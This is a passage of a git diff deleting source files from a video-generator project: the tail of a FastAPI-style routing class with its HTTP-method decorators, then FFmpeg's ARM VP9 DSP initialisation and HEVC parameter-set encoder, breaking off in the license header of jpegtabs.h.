current_callbacks.extend(route.callbacks) - current_generate_unique_id = get_value_or_default( - route.generate_unique_id_function, - router.generate_unique_id_function, - generate_unique_id_function, - self.generate_unique_id_function, - ) - self.add_api_route( - prefix + route.path, - route.endpoint, - response_model=route.response_model, - status_code=route.status_code, - tags=current_tags, - dependencies=current_dependencies, - summary=route.summary, - description=route.description, - response_description=route.response_description, - responses=combined_responses, - deprecated=route.deprecated or deprecated or self.deprecated, - methods=route.methods, - operation_id=route.operation_id, - response_model_include=route.response_model_include, - response_model_exclude=route.response_model_exclude, - response_model_by_alias=route.response_model_by_alias, - response_model_exclude_unset=route.response_model_exclude_unset, - response_model_exclude_defaults=route.response_model_exclude_defaults, - response_model_exclude_none=route.response_model_exclude_none, - include_in_schema=route.include_in_schema - and self.include_in_schema - and include_in_schema, - response_class=use_response_class, - name=route.name, - route_class_override=type(route), - callbacks=current_callbacks, - openapi_extra=route.openapi_extra, - generate_unique_id_function=current_generate_unique_id, - ) - elif isinstance(route, routing.Route): - methods = list(route.methods or []) - self.add_route( - prefix + route.path, - route.endpoint, - methods=methods, - include_in_schema=route.include_in_schema, - name=route.name, - ) - elif isinstance(route, APIWebSocketRoute): - current_dependencies = [] - if dependencies: - current_dependencies.extend(dependencies) - if route.dependencies: - current_dependencies.extend(route.dependencies) - self.add_api_websocket_route( - prefix + route.path, - route.endpoint, - dependencies=current_dependencies, - name=route.name, - ) - elif isinstance(route, routing.WebSocketRoute): - self.add_websocket_route( - prefix + route.path, route.endpoint, name=route.name - ) - for handler in router.on_startup: - self.add_event_handler("startup", handler) - for handler in router.on_shutdown: - self.add_event_handler("shutdown", handler) - - def get( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["GET"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def put( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["PUT"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def post( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["POST"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def delete( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["DELETE"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def options( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["OPTIONS"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def head( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["HEAD"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def patch( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["PATCH"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def trace( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["TRACE"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def on_event( - self, event_type: str - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_event_handler(event_type, func) - return func - - return decorator diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/vp9dsp_init_arm.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/vp9dsp_init_arm.c deleted file mode 100644 index b3911f7e497a0caad686a5519d41e3926c8a5a92..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/vp9dsp_init_arm.c +++ /dev/null @@ -1,259 +0,0 @@ -/* - * Copyright (c) 2016 Google Inc. - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include - -#include "libavutil/attributes.h" -#include "libavutil/internal.h" -#include "libavutil/mem_internal.h" -#include "libavutil/arm/cpu.h" -#include "libavcodec/vp9dsp.h" -#include "vp9dsp_init.h" - -#define declare_fpel(type, sz) \ -void ff_vp9_##type##sz##_neon(uint8_t *dst, ptrdiff_t dst_stride, \ - const uint8_t *src, ptrdiff_t src_stride, \ - int h, int mx, int my) - -#define declare_copy_avg(sz) \ - declare_fpel(copy, sz); \ - declare_fpel(avg , sz) - -#define decl_mc_func(op, filter, dir, sz) \ -void ff_vp9_##op##_##filter##sz##_##dir##_neon(uint8_t *dst, ptrdiff_t dst_stride, \ - const uint8_t *src, ptrdiff_t src_stride, \ - int h, int mx, int my) - -#define define_8tap_2d_fn(op, filter, sz) \ -static void op##_##filter##sz##_hv_neon(uint8_t *dst, ptrdiff_t dst_stride, \ - const uint8_t *src, ptrdiff_t src_stride, \ - int h, int mx, int my) \ -{ \ - LOCAL_ALIGNED_16(uint8_t, temp, [((1 + (sz < 64)) * sz + 8) * sz]); \ - /* We only need h + 7 lines, but the horizontal filter assumes an \ - * even number of rows, so filter h + 8 lines here. */ \ - ff_vp9_put_##filter##sz##_h_neon(temp, sz, \ - src - 3 * src_stride, src_stride, \ - h + 8, mx, 0); \ - ff_vp9_##op##_##filter##sz##_v_neon(dst, dst_stride, \ - temp + 3 * sz, sz, \ - h, 0, my); \ -} - -#define decl_filter_funcs(op, dir, sz) \ - decl_mc_func(op, regular, dir, sz); \ - decl_mc_func(op, sharp, dir, sz); \ - decl_mc_func(op, smooth, dir, sz) - -#define decl_mc_funcs(sz) \ - decl_filter_funcs(put, h, sz); \ - decl_filter_funcs(avg, h, sz); \ - decl_filter_funcs(put, v, sz); \ - decl_filter_funcs(avg, v, sz); \ - decl_filter_funcs(put, hv, sz); \ - decl_filter_funcs(avg, hv, sz) - -declare_copy_avg(64); -declare_copy_avg(32); -declare_copy_avg(16); -declare_copy_avg(8); -declare_copy_avg(4); - -decl_mc_funcs(64); -decl_mc_funcs(32); -decl_mc_funcs(16); -decl_mc_funcs(8); -decl_mc_funcs(4); - -#define define_8tap_2d_funcs(sz) \ - define_8tap_2d_fn(put, regular, sz) \ - define_8tap_2d_fn(put, sharp, sz) \ - define_8tap_2d_fn(put, smooth, sz) \ - define_8tap_2d_fn(avg, regular, sz) \ - define_8tap_2d_fn(avg, sharp, sz) \ - define_8tap_2d_fn(avg, smooth, sz) - -define_8tap_2d_funcs(64) -define_8tap_2d_funcs(32) -define_8tap_2d_funcs(16) -define_8tap_2d_funcs(8) -define_8tap_2d_funcs(4) - - -static av_cold void vp9dsp_mc_init_arm(VP9DSPContext *dsp) -{ - int cpu_flags = av_get_cpu_flags(); - - if (have_neon(cpu_flags)) { -#define init_fpel(idx1, idx2, sz, type) \ - dsp->mc[idx1][FILTER_8TAP_SMOOTH ][idx2][0][0] = \ - dsp->mc[idx1][FILTER_8TAP_REGULAR][idx2][0][0] = \ - dsp->mc[idx1][FILTER_8TAP_SHARP ][idx2][0][0] = \ - dsp->mc[idx1][FILTER_BILINEAR ][idx2][0][0] = ff_vp9_##type##sz##_neon - -#define init_copy_avg(idx, sz) \ - init_fpel(idx, 0, sz, copy); \ - init_fpel(idx, 1, sz, avg) - -#define init_mc_func(idx1, idx2, op, filter, fname, dir, mx, my, sz, pfx) \ - dsp->mc[idx1][filter][idx2][mx][my] = pfx##op##_##fname##sz##_##dir##_neon - -#define init_mc_funcs(idx, dir, mx, my, sz, pfx) \ - init_mc_func(idx, 0, put, FILTER_8TAP_REGULAR, regular, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 0, put, FILTER_8TAP_SHARP, sharp, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 0, put, FILTER_8TAP_SMOOTH, smooth, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 1, avg, FILTER_8TAP_REGULAR, regular, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 1, avg, FILTER_8TAP_SHARP, sharp, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 1, avg, FILTER_8TAP_SMOOTH, smooth, dir, mx, my, sz, pfx) - -#define init_mc_funcs_dirs(idx, sz) \ - init_mc_funcs(idx, h, 1, 0, sz, ff_vp9_); \ - init_mc_funcs(idx, v, 0, 1, sz, ff_vp9_); \ - init_mc_funcs(idx, hv, 1, 1, sz,) - - init_copy_avg(0, 64); - init_copy_avg(1, 32); - init_copy_avg(2, 16); - init_copy_avg(3, 8); - init_copy_avg(4, 4); - - init_mc_funcs_dirs(0, 64); - init_mc_funcs_dirs(1, 32); - init_mc_funcs_dirs(2, 16); - init_mc_funcs_dirs(3, 8); - init_mc_funcs_dirs(4, 4); - } -} - -#define define_itxfm(type_a, type_b, sz) \ -void ff_vp9_##type_a##_##type_b##_##sz##x##sz##_add_neon(uint8_t *_dst, \ - ptrdiff_t stride, \ - int16_t *_block, int eob) - -#define define_itxfm_funcs(sz) \ - define_itxfm(idct, idct, sz); \ - define_itxfm(iadst, idct, sz); \ - define_itxfm(idct, iadst, sz); \ - define_itxfm(iadst, iadst, sz) - -define_itxfm_funcs(4); -define_itxfm_funcs(8); -define_itxfm_funcs(16); -define_itxfm(idct, idct, 32); -define_itxfm(iwht, iwht, 4); - - -static av_cold void vp9dsp_itxfm_init_arm(VP9DSPContext *dsp) -{ - int cpu_flags = av_get_cpu_flags(); - - if (have_neon(cpu_flags)) { -#define init_itxfm(tx, sz) \ - dsp->itxfm_add[tx][DCT_DCT] = ff_vp9_idct_idct_##sz##_add_neon; \ - dsp->itxfm_add[tx][DCT_ADST] = ff_vp9_iadst_idct_##sz##_add_neon; \ - dsp->itxfm_add[tx][ADST_DCT] = ff_vp9_idct_iadst_##sz##_add_neon; \ - dsp->itxfm_add[tx][ADST_ADST] = ff_vp9_iadst_iadst_##sz##_add_neon - -#define init_idct(tx, nm) \ - dsp->itxfm_add[tx][DCT_DCT] = \ - dsp->itxfm_add[tx][ADST_DCT] = \ - dsp->itxfm_add[tx][DCT_ADST] = \ - dsp->itxfm_add[tx][ADST_ADST] = ff_vp9_##nm##_add_neon - - init_itxfm(TX_4X4, 4x4); - init_itxfm(TX_8X8, 8x8); - init_itxfm(TX_16X16, 16x16); - init_idct(TX_32X32, idct_idct_32x32); - init_idct(4, iwht_iwht_4x4); - } -} - -#define define_loop_filter(dir, wd, size) \ -void ff_vp9_loop_filter_##dir##_##wd##_##size##_neon(uint8_t *dst, ptrdiff_t stride, int E, int I, int H) - -#define define_loop_filters(wd, size) \ - define_loop_filter(h, wd, size); \ - define_loop_filter(v, wd, size) - -define_loop_filters(4, 8); -define_loop_filters(8, 8); -define_loop_filters(16, 8); -define_loop_filters(16, 16); - -define_loop_filters(44, 16); - -#define lf_mix_fn(dir, wd1, wd2, stridea) \ -static void loop_filter_##dir##_##wd1##wd2##_16_neon(uint8_t *dst, \ - ptrdiff_t stride, \ - int E, int I, int H) \ -{ \ - ff_vp9_loop_filter_##dir##_##wd1##_8_neon(dst, stride, E & 0xff, I & 0xff, H & 0xff); \ - ff_vp9_loop_filter_##dir##_##wd2##_8_neon(dst + 8 * stridea, stride, E >> 8, I >> 8, H >> 8); \ -} - -#define lf_mix_fns(wd1, wd2) \ - lf_mix_fn(h, wd1, wd2, stride) \ - lf_mix_fn(v, wd1, wd2, sizeof(uint8_t)) - -lf_mix_fns(4, 8) -lf_mix_fns(8, 4) -lf_mix_fns(8, 8) - -static av_cold void vp9dsp_loopfilter_init_arm(VP9DSPContext *dsp) -{ - int cpu_flags = av_get_cpu_flags(); - - if (have_neon(cpu_flags)) { - dsp->loop_filter_8[0][1] = ff_vp9_loop_filter_v_4_8_neon; - dsp->loop_filter_8[0][0] = ff_vp9_loop_filter_h_4_8_neon; - dsp->loop_filter_8[1][1] = ff_vp9_loop_filter_v_8_8_neon; - dsp->loop_filter_8[1][0] = ff_vp9_loop_filter_h_8_8_neon; - dsp->loop_filter_8[2][1] = ff_vp9_loop_filter_v_16_8_neon; - dsp->loop_filter_8[2][0] = ff_vp9_loop_filter_h_16_8_neon; - - dsp->loop_filter_16[0] = ff_vp9_loop_filter_h_16_16_neon; - dsp->loop_filter_16[1] = ff_vp9_loop_filter_v_16_16_neon; - - dsp->loop_filter_mix2[0][0][0] = ff_vp9_loop_filter_h_44_16_neon; - dsp->loop_filter_mix2[0][0][1] = ff_vp9_loop_filter_v_44_16_neon; - dsp->loop_filter_mix2[0][1][0] = loop_filter_h_48_16_neon; - dsp->loop_filter_mix2[0][1][1] = loop_filter_v_48_16_neon; - dsp->loop_filter_mix2[1][0][0] = loop_filter_h_84_16_neon; - dsp->loop_filter_mix2[1][0][1] = loop_filter_v_84_16_neon; - dsp->loop_filter_mix2[1][1][0] = loop_filter_h_88_16_neon; - dsp->loop_filter_mix2[1][1][1] = loop_filter_v_88_16_neon; - } -} - -av_cold void ff_vp9dsp_init_arm(VP9DSPContext *dsp, int bpp) -{ - if (bpp == 10) { - ff_vp9dsp_init_10bpp_arm(dsp); - return; - } else if (bpp == 12) { - ff_vp9dsp_init_12bpp_arm(dsp); - return; - } else if (bpp != 8) - return; - - vp9dsp_mc_init_arm(dsp); - vp9dsp_loopfilter_init_arm(dsp); - vp9dsp_itxfm_init_arm(dsp); -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hevc_ps_enc.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hevc_ps_enc.c deleted file mode 100644 index 72641b2ffb69dd26b29c0042eb03eed0c60f7dd8..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hevc_ps_enc.c +++ /dev/null @@ -1,121 +0,0 @@ -/* - * HEVC Parameter Set encoding - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "put_golomb.h" -#include "hevc_ps.h" -#include "put_bits.h" - -static void write_ptl_layer(PutBitContext *pb, PTLCommon *ptl) -{ - int i; - - put_bits(pb, 2, ptl->profile_space); - put_bits(pb, 1, ptl->tier_flag); - put_bits(pb, 5, ptl->profile_idc); - for (i = 0; i < 32; i++) - put_bits(pb, 1, ptl->profile_compatibility_flag[i]); - put_bits(pb, 1, ptl->progressive_source_flag); - put_bits(pb, 1, ptl->interlaced_source_flag); - put_bits(pb, 1, ptl->non_packed_constraint_flag); - put_bits(pb, 1, ptl->frame_only_constraint_flag); - put_bits32(pb, 0); // reserved - put_bits(pb, 12, 0); // reserved -} - -static void write_ptl(PutBitContext *pb, PTL *ptl, int max_num_sub_layers) -{ - int i; - - write_ptl_layer(pb, &ptl->general_ptl); - put_bits(pb, 8, ptl->general_ptl.level_idc); - - for (i = 0; i < max_num_sub_layers - 1; i++) { - put_bits(pb, 1, ptl->sub_layer_profile_present_flag[i]); - put_bits(pb, 1, ptl->sub_layer_level_present_flag[i]); - } - - if (max_num_sub_layers > 1) - for (i = max_num_sub_layers - 1; i < 8; i++) - put_bits(pb, 2, 0); // reserved - - for (i = 0; i < max_num_sub_layers - 1; i++) { - if (ptl->sub_layer_profile_present_flag[i]) - write_ptl_layer(pb, &ptl->sub_layer_ptl[i]); - if (ptl->sub_layer_level_present_flag[i]) - put_bits(pb, 8, ptl->sub_layer_ptl[i].level_idc); - } -} - -int ff_hevc_encode_nal_vps(HEVCVPS *vps, unsigned int id, - uint8_t *buf, int buf_size) -{ - PutBitContext pb; - int i, data_size; - - init_put_bits(&pb, buf, buf_size); - put_bits(&pb, 4, id); - put_bits(&pb, 2, 3); // reserved - put_bits(&pb, 6, vps->vps_max_layers - 1); - put_bits(&pb, 3, vps->vps_max_sub_layers - 1); - put_bits(&pb, 1, vps->vps_temporal_id_nesting_flag); - put_bits(&pb, 16, 0xffff); // reserved - - write_ptl(&pb, &vps->ptl, vps->vps_max_sub_layers); - - put_bits(&pb, 1, vps->vps_sub_layer_ordering_info_present_flag); - for (i = vps->vps_sub_layer_ordering_info_present_flag ? 0 : vps->vps_max_layers - 1; - i < vps->vps_max_sub_layers; i++) { - set_ue_golomb(&pb, vps->vps_max_dec_pic_buffering[i] - 1); - set_ue_golomb(&pb, vps->vps_num_reorder_pics[i]); - set_ue_golomb(&pb, vps->vps_max_latency_increase[i] + 1); - } - - put_bits(&pb, 6, vps->vps_max_layer_id); - set_ue_golomb(&pb, vps->vps_num_layer_sets - 1); - - if (vps->vps_num_layer_sets > 1) { - avpriv_report_missing_feature(NULL, "Writing layer_id_included_flag"); - return AVERROR_PATCHWELCOME; - } - - put_bits(&pb, 1, vps->vps_timing_info_present_flag); - if (vps->vps_timing_info_present_flag) { - put_bits32(&pb, vps->vps_num_units_in_tick); - put_bits32(&pb, vps->vps_time_scale); - put_bits(&pb, 1, vps->vps_poc_proportional_to_timing_flag); - if (vps->vps_poc_proportional_to_timing_flag) - set_ue_golomb(&pb, vps->vps_num_ticks_poc_diff_one - 1); - - set_ue_golomb(&pb, vps->vps_num_hrd_parameters); - if (vps->vps_num_hrd_parameters) { - avpriv_report_missing_feature(NULL, "Writing HRD parameters"); - return AVERROR_PATCHWELCOME; - } - } - - put_bits(&pb, 1, 0); // extension flag - - put_bits(&pb, 1, 1); // stop bit - flush_put_bits(&pb); - - data_size = put_bytes_output(&pb); - - return data_size; -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/jpegtabs.h b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/jpegtabs.h deleted file mode 100644 index 7106f66df03cd57607126b964f9af7b7c193dc81..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/jpegtabs.h +++ /dev/null @@ -1,92 +0,0 @@ -/* - * MJPEG tables - * Copyright (c) 2000, 2001 Fabrice Bellard - * Copyright (c) 2003 Alex Beregszaszi - * Copyright (c) 2003-2004 Michael Niedermayer - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the 